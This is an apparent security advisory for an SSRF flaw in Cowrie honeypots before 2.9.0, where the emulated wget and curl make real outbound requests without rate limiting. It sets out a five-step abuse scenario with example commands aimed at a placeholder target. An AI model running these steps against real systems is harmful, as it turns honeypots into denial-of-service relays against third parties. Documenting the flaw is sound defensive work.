Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
Cowrie honeypots are vulnerable to a Server-Side Request Forgery (SSRF) attack, allowing attackers to leverage the honeypot to launch denial-of-service (DoS) attacks against external targets. This vulnerability stems from the emulated wget and curl commands within Cowrie, enabling attackers to trigger unbounded HTTP traffic from the honeypot's IP address, effectively masking their origin and amplifying the attack's impact.
Step 1: Access Cowrie Honeypot: The attacker gains access to the Cowrie honeypot, likely through a successful credential brute-force or by exploiting another vulnerability.
Step 2: Command Injection: The attacker interacts with the emulated shell and issues a crafted command using either wget or curl, specifying a malicious URL as the target. For example: wget http://target.example.com/ or curl http://target.example.com/.
Step 3: SSRF Trigger: The emulated wget or curl command, lacking input validation, processes the attacker-supplied URL and initiates an outbound HTTP request to the specified target.
Step 4: Amplification and DoS: The attacker repeats the command, potentially using scripting or automation, to generate a large volume of HTTP requests from the Cowrie honeypot to the target. Without rate limiting, the honeypot continuously sends requests, overwhelming the target server and causing a denial-of-service condition.
Step 5: Source Address Masking: The target server sees the requests originating from the Cowrie honeypot's IP address, effectively masking the attacker's true source.
The vulnerability lies within Cowrie's emulated shell environment, specifically in the implementation of wget and curl. These emulations, designed to mimic the behavior of the real commands, fail to implement proper input validation or rate limiting on outbound HTTP requests. The root cause is the lack of checks on the destination URL provided by the attacker, allowing them to specify any arbitrary target. The absence of rate limiting allows for the repeated invocation of these commands, leading to an unbounded number of HTTP requests. This design flaw allows attackers to use the honeypot as an amplification node, directing traffic towards a target and masking their own IP address.